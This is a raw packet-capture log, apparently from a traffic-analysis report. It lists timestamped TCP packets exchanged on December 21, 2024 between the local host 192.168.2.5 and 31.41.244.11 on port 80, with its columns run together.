                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.920972109 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.921897888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.921953917 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.921998978 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.922051907 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.923063040 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.923115015 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.923170090 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.923209906 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.924218893 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.924267054 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.924325943 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.924371004 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.925374031 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.925421953 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.925486088 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.925534010 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.926537991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.926624060 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.926667929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.926712990 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.927727938 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.927778959 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.927836895 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.927885056 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.928915024 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.928961992 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.929043055 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.929090977 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.930041075 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.930088997 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.930152893 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.930198908 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.931165934 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.931210995 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.931288004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.931335926 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.932385921 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.932418108 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.932446957 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.932466030 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.933538914 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.933595896 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.933605909 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.933640957 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.934690952 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.934735060 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.934792042 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.934834003 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.935849905 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.935898066 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.935928106 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.935971975 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.936999083 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.937050104 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.937108040 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.937150955 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.938235998 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.938280106 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.938384056 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.938426971 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.939368963 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.939416885 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.939457893 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.939497948 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.940550089 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.940598965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.940635920 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.940679073 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.941668987 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.941715002 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.941773891 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.941816092 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.942907095 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.942955971 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.942960978 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.943005085 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.943994999 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.944045067 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.944174051 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.944215059 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.945167065 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.945210934 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.945283890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.945333958 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.946341038 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.946384907 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.946443081 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.946484089 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.947490931 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.947534084 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.947609901 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.947650909 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.948654890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.948719978 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.948780060 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.948821068 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.949831963 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.949875116 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.950000048 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.950043917 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.950995922 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.951037884 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.951040030 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.951077938 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.952146053 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.952193022 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.952249050 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.952289104 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.953311920 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.953356981 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.953437090 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.953478098 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.954504013 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.954550028 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.954617023 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.954658985 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.955652952 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.955694914 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.955744982 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.955785990 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.956806898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.956862926 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.956912041 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.956953049 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.957983971 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.958028078 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.958071947 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.958112955 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.959172964 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.959218025 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.959270954 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.959333897 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.960308075 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.960350037 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.960436106 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.960478067 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.961481094 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.961527109 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.961587906 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.961628914 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.962656021 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.962692976 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.962857962 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.962903023 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.963800907 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.963850975 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.963912964 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.963957071 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.965010881 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.965054989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.965318918 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.965361118 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.966147900 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.966191053 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.966245890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.966288090 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.967293024 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.967339039 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.967405081 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.967447042 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.968456984 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.968501091 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.968566895 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.968616009 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.969629049 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.969676018 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.969748974 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.969790936 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.970793962 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.970834970 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.970902920 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.970944881 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.971951962 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.971997023 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.972045898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.972093105 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.973124981 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.973170996 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.973196030 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:13.973244905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.104979038 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.105304003 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.105360031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.105564117 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.105638027 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.105684996 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.106517076 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.106563091 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.106848955 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.107522011 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.107836962 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.107922077 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.107959032 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.108047009 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.108789921 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.108858109 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.108906984 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.108952045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.109963894 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.110044956 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.110050917 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.110094070 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.111144066 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.111239910 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.111289024 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.112313986 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.112440109 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.112493992 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.113477945 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.113523960 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.113578081 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.114098072 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.114610910 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.114662886 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.114749908 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.114789963 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.115770102 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.115818977 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.115833998 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.115875959 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.116964102 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.117011070 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.117120028 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.118153095 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.118197918 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.118257046 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.119280100 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.119332075 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.119374037 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.119412899 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.120448112 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.120568991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.120619059 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.121603012 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.121650934 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.121695042 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.121862888 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.122766972 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.122934103 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.122982979 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.123956919 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.124001026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.124047041 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.124110937 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.125087976 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.125137091 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.125140905 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.125184059 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.126255035 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.126302958 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.126477957 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.126519918 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.127419949 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.127465963 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.127533913 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.127577066 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.128591061 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.128643036 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.128644943 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.128685951 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.129767895 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.129808903 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.129863977 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.129904985 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.130983114 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:14.131026030 CET4982880192.168.2.531.41.244.11
